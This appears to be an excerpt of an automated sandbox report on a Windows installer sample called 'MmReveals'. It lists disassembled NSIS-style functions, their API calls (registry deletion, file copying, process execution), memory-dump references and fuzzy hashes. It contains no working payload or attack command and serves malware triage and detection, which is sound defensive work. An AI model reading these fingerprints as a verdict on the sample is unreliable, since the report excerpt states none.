                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                          • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                          • API String ID: 2014279497-3433828417
                          • Opcode ID: 04fd410bbb31de0d7d21d8cf733f8caec58fdd5b228a354368cf1c704b35d166
                          • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                          • Opcode Fuzzy Hash: 04fd410bbb31de0d7d21d8cf733f8caec58fdd5b228a354368cf1c704b35d166
                          • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                          Function 0040484E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                          • GetMessagePos.USER32 ref: 00404871
                          • ScreenToClient.USER32(?,?), ref: 00404889
                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: Message$Send$ClientScreen
                          • String ID: f
                          • API String ID: 41195575-1993550816
                          • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                          • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                          • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                          • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                          Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                          Download Yara Rule
                          APIs
                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                          • MulDiv.KERNEL32(0000F200,00000064,?), ref: 00403295
                          • wsprintfW.USER32 ref: 004032A5
                          • SetWindowTextW.USER32(?,?), ref: 004032B5
                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                          Strings
                          • verifying installer: %d%%, xrefs: 0040329F
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: Text$ItemTimerWindowwsprintf
                          • String ID: verifying installer: %d%%
                          • API String ID: 1451636040-82062127
                          • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                          • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                          • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                          • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                          Function 004043AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                          • wsprintfW.USER32 ref: 00404457
                          • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: ItemTextlstrlenwsprintf
                          • String ID: %u.%u%s%s$@rD
                          • API String ID: 3540041739-1813061909
                          • Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                          • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                          • Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                          • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                          Function 00406038 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                          Download Yara Rule
                          APIs
                          • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                          • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                          • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                          • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: Char$Next$Prev
                          • String ID: *?|<>/":
                          • API String ID: 589700163-165019052
                          • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                          • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                          • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                          • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                          Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                          • RegCloseKey.ADVAPI32(?), ref: 00401504
                          • RegCloseKey.ADVAPI32(?), ref: 00401529
                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: Close$DeleteEnumOpen
                          • String ID:
                          • API String ID: 1912718029-0
                          • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                          • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                          • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                          • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                          Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetDlgItem.USER32(?), ref: 004020A3
                          • GetClientRect.USER32(00000000,?), ref: 004020B0
                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                          • DeleteObject.GDI32(00000000), ref: 004020EE
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                          • String ID:
                          • API String ID: 1849352358-0
                          • Opcode ID: 3f37f65ad39e50193b5eb5465f4a6a1b76990ca473236759665c0c01a91169be
                          • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                          • Opcode Fuzzy Hash: 3f37f65ad39e50193b5eb5465f4a6a1b76990ca473236759665c0c01a91169be
                          • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                          Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: MessageSend$Timeout
                          • String ID: !
                          • API String ID: 1777923405-2657877971
                          • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                          • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                          • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                          • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                          Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                          • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                          Strings
                          • DeleteRegKey: "%s\%s", xrefs: 00402843
                          • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                          • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                          • API String ID: 1697273262-1764544995
                          • Opcode ID: 48bae300e43d63654b7fe916574e47b7d5bb67918eda10473d167f607cc9ee43
                          • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                          • Opcode Fuzzy Hash: 48bae300e43d63654b7fe916574e47b7d5bb67918eda10473d167f607cc9ee43
                          • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                          Function 004048CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58windowCOMMON
                          Download Yara Rule
                          APIs
                          • IsWindowVisible.USER32(?), ref: 00404902
                          • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                            • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: Window$CallMessageProcSendVisible
                          • String ID: $@rD
                          • API String ID: 3748168415-881980237
                          • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                          • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                          • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                          • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                          Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                            • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                            • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                          • lstrlenW.KERNEL32 ref: 004026B4
                          • lstrlenW.KERNEL32(00000000), ref: 004026C1
                          • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                          • String ID: CopyFiles "%s"->"%s"
                          • API String ID: 2577523808-3778932970
                          • Opcode ID: f84dc7438b734d649018535b99f5ff883fadf72990f7ea17a428efaae3f8c2d6
                          • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                          • Opcode Fuzzy Hash: f84dc7438b734d649018535b99f5ff883fadf72990f7ea17a428efaae3f8c2d6
                          • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                          Function 00406224 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: lstrcatwsprintf
                          • String ID: %02x%c$...
                          • API String ID: 3065427908-1057055748
                          • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                          • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                          • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                          • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                          Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                          • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: PrivateProfileStringWritelstrcpyn
                          • String ID: <RM>$WriteINIStr: wrote [%s] %s=%s in %s$open
                          • API String ID: 247603264-1827671502
                          • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                          • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                          • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                          • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD
                          Function 00405047 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                          Download Yara Rule
                          APIs
                          • OleInitialize.OLE32(00000000), ref: 00405057
                            • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                          • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                          • String ID: Section: "%s"$Skipping section: "%s"
                          • API String ID: 2266616436-4211696005
                          • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                          • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                          • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                          • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                          Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                          Download Yara Rule
                          APIs
                          • GetDC.USER32(?), ref: 00402100
                          • GetDeviceCaps.GDI32(00000000), ref: 00402107
                          • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                          • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                            • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                          • String ID:
                          • API String ID: 1599320355-0
                          • Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                          • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                          • Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                          • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                          Function 004071F8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                          • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                          • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                          • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
